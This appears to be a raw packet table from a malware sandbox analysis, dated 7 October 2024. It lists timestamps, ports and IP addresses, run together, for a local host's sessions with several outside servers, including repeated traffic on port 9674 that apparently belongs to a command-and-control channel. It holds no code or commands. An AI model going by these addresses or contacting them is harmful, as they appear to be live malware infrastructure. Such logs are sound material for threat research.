                                                                                                                                                                    Oct 7, 2024 14:53:16.071729898 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.071820021 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.071835995 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.071856976 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.071891069 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.071903944 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154262066 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154330015 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154330969 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154361963 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154395103 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154411077 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154459000 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154490948 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154504061 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154524088 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154555082 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154576063 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154618979 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154650927 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154664040 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154684067 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154716015 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154731035 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154778004 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154808998 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154823065 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154844046 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154872894 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154911995 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.154946089 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154964924 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.154983997 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155015945 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155047894 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155062914 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155080080 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155112028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155127048 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155143023 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155174971 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155196905 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155208111 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155241013 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155255079 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155272961 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155306101 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155319929 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155339003 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155373096 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155391932 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155421972 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155456066 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155471087 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155488968 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155523062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155536890 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.155550003 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.155603886 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.260297060 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260373116 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260406971 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260448933 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.260469913 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260504961 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260536909 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.260538101 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260571957 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.260632992 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.559906960 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.560065031 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.560112000 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.737781048 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:16.883655071 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:16.888710022 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:16.888791084 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:16.896281958 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:16.901240110 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.403583050 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.534955978 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.535329103 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:17.539283991 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:17.544399977 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.546653032 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:17.551714897 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.939568043 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:17.941076040 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:17.945981026 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.036911964 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.042957067 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.047946930 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.048388958 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.051456928 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.056322098 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.162172079 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:53:18.167066097 CEST8049179178.237.33.50192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.167119980 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:53:18.167373896 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:53:18.172135115 CEST8049179178.237.33.50192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.264513969 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.264694929 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.519469023 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.647669077 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.647842884 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.654347897 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.659360886 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.659444094 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.665313959 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.665375948 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.670393944 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.773524046 CEST8049179178.237.33.50192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.773612022 CEST4917980192.168.2.22178.237.33.50
                                                                                                                                                                    Oct 7, 2024 14:53:18.822324991 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822361946 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822422981 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822477102 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822510004 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822542906 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822575092 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822587013 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.822587013 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.822587967 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.822611094 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822643995 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822678089 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822693110 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.822712898 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822748899 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.822761059 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.822805882 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.827899933 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.827929974 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.827975988 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.880578041 CEST491779674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.885564089 CEST967449177192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908921957 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908936024 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908941984 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908946991 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908951998 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908961058 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908967972 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908972979 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.908978939 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909100056 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.909100056 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.909830093 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909841061 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909847021 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909908056 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.909928083 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909938097 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909949064 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.909984112 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.910793066 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.910847902 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.910916090 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.910926104 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.910937071 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.910968065 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.911014080 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911025047 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911066055 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.911695957 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911726952 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911736965 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911747932 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.911747932 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.911778927 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.911998987 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995347023 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995443106 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995493889 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995510101 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995528936 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995578051 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995580912 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995635986 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995668888 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995692968 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995709896 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995722055 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995733023 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995743990 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995754957 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995757103 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995768070 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.995784044 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.995827913 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.996181011 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996192932 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996203899 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996236086 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.996260881 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996273041 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996284008 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996295929 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996306896 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996314049 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.996332884 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.996974945 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996987104 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.996997118 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997028112 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.997055054 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997066021 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997077942 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997088909 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997097969 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.997116089 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997123003 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.997163057 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.997884989 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997939110 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997950077 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.997987986 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.998003006 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998013973 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998023987 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998035908 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998053074 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.998059988 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998075008 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.998862982 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998874903 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998886108 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998917103 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998919964 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.998928070 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998944998 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998959064 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.998975039 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998986006 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:18.998992920 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.999022961 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:18.999447107 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.001034021 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.001092911 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.001104116 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.001115084 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.001146078 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.001158953 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.005578995 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.081681013 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081712961 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081729889 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081793070 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081804991 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081816912 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081829071 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081840038 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081873894 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.081976891 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.081978083 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.081978083 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.081989050 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082000971 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082012892 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082025051 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082036018 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082039118 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082048893 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082061052 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082062960 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082086086 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082106113 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082192898 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082205057 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082216978 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082252026 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082264900 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082277060 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082288980 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082302094 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082320929 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082353115 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082391024 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082402945 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082413912 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082446098 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082652092 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082664013 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082674980 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082712889 CEST491789674192.168.2.22192.3.101.184
                                                                                                                                                                    Oct 7, 2024 14:53:19.082763910 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082776070 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082791090 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082803965 CEST967449178192.3.101.184192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:19.082815886 CEST967449178192.3.101.184192.168.2.22
